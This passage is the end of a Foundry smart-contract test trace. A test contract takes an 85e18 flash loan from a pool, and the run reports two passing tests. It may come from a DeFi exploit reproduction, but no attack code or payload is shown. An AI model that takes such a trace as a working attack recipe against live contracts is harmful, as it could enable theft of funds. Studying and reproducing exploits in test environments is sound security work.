    │   │   └─ ← [Return] 2857940958550351828128 [2.857e21]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(Pool: [0xC5c134A1f112efA96003f8559Dba6fAC0BA77692]) [staticcall]
    │   │   └─ ← [Return] 8783201251326246893244 [8.783e21]
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 85000000000000000000 [8.5e19], param3: 0, param4: 8500000000000000 [8.5e15], param5: 0)
    │   ├─  storage changes:
    │   │   @ 1: 0x0000000000000000000000000000000000000005f1604ca726ffd2086c622c2e → 0x00000000000000000000000000000000000000061e129e33b459d4ba532b2c3e
    │   └─ ← [Stop]
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 19.88s (18.32s CPU time)

Ran 2 test suites in 19.91s (20.38s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
